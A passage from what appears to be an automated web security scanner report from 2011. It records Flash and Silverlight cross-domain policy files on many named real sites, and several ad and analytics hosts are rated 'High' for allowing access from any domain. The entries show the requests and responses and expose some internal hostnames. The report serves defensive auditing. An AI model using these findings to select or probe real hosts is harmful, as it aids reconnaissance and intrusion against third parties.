Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Tue, 06 Sep 2011 22:44:04 GMT
Date: Mon, 05 Sep 2011 22:44:04 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 66149

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.131. http://search.oracle.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.oracle.com

Response

HTTP/1.0 200 OK
ETag: "2916d-103-4d8251fe"
Content-Type: application/xml
Last-Modified: Thu, 17 Mar 2011 18:25:02 GMT
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (G;max-age=0+0;age=0;ecid=118531604508,0)
Date: Tue, 06 Sep 2011 15:54:24 GMT
Content-Length: 259
Connection: close
Set-Cookie: BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
...[SNIP]...

4.132. http://sophelle.app5.hubspot.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sophelle.app5.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sophelle.app5.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:111e7"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:27:54 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

4.133. http://sun.edgeboss.net/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sun.edgeboss.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: sun.edgeboss.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "7be11faf85a93e167b2214a018411ba6:1237306055"
Last-Modified: Tue, 17 Mar 2009 16:07:35 GMT
Accept-Ranges: bytes
Content-Length: 384
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:13:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="optimizeyourit.com" />
   <allow-access-from domain="optimiseyourit.com" />
   <allow-access-from domain="www.optimizeyourit.com" />
   <allow-access-from domain="www.optimiseyourit.com" />
...[SNIP]...

4.134. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:47 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:02:47 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.135. http://www.covergirl.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.covergirl.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 12:19:16 GMT
Accept-Ranges: bytes
ETag: "03a528e8e56cc1:295a5"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:26 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="cgmakeover.appspot.com"/>
<allow-http-request-headers-from domain="
...[SNIP]...

5. Silverlight cross-domain policy

There are 23 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Tue, 06 Sep 2011 17:05:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1718"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 14:57:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.3. http://ads1.msn.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Tue, 06 Sep 2011 15:00:14 GMT
Content-Length: 348
Content-Type: text/xml
Last-Modified: Fri, 01 Apr 2011 20:58:23 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Tue, 01 May 2012 16:29:02 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>

...[SNIP]...

5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.5. http://intelligence.marykay.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://intelligence.marykay.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: intelligence.marykay.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:51 GMT
Server: Omniture DC/2.0.0
xserver: www425
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://oimg.m.cnbc.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.m.cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oimg.m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:48 GMT
Server: Omniture DC/2.0.0
xserver: www369
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://oimg.nbcuni.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.nbcuni.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:45 GMT
Server: Omniture DC/2.0.0
xserver: www339
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.8. http://omni.csc.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.csc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omni.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:45 GMT
Server: Omniture DC/2.0.0
xserver: www366
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.9. http://oracle.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracle.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracle.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:05 GMT
Server: Omniture DC/2.0.0
xserver: www635
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.10. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:27 GMT
Server: Omniture DC/2.0.0
xserver: www166
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.11. http://oracleuniversity.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracleuniversity.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:45 GMT
Server: Omniture DC/2.0.0
xserver: www393
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.12. http://pixel.quantserve.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 312
Date: Tue, 06 Sep 2011 14:56:57 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

5.13. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 00:34:25 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 51825
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Tue, 13 Sep 2011 14:56:57 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.15. http://speed.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:11 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.16. http://stats.deloitte.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.deloitte.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.deloitte.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:02 GMT
Server: Omniture DC/2.0.0
xserver: www384
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.17. http://wingateweb.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wingateweb.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wingateweb.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:53 GMT
Server: Omniture DC/2.0.0
xserver: www93
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.18. http://cnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
ETag: "0a59338016cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:43 GMT
Connection: close
Content-Length: 1330

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.19. http://cvs.shoplocal.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cvs.shoplocal.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cvs.shoplocal.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 24 Feb 2010 18:37:08 GMT
Accept-Ranges: bytes
ETag: "0a2895e80b5ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Content-Length: 950
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*.msn.com" />

...[SNIP]...
<domain uri="http://*.msn-int.com" />
...[SNIP]...
<domain uri="http://*.crossmediaservices.com"/>
       <domain uri="http://*.shoplocal.com" />
       <domain uri="http://vqascweb1"/>
       <domain uri="http://vqascweb2"/>
       <domain uri="http://devweb1" />
       <domain uri="http://media.pointroll.com" />
       <domain uri="http://www.pointroll.com" />
       <domain uri="http://data.pointroll.com" />
       <domain uri="http://speed.pointroll.com" />
       <domain uri="http://mirror.pointroll.com" />
       <domain uri="http://geo.pointroll.com"/>
       <domain uri="http://*.pointroll.com"/>
...[SNIP]...

5.20. http://executivevision.cnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://executivevision.cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: executivevision.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
ETag: "0a59338016cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:04:28 GMT
Connection: close
Content-Length: 1330

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.21. http://media.cnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: media.cnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
ETag: "0a59338016cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1330
Date: Tue, 06 Sep 2011 14:56:31 GMT
Connection: close
Cache-Control: public, max-age=900

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
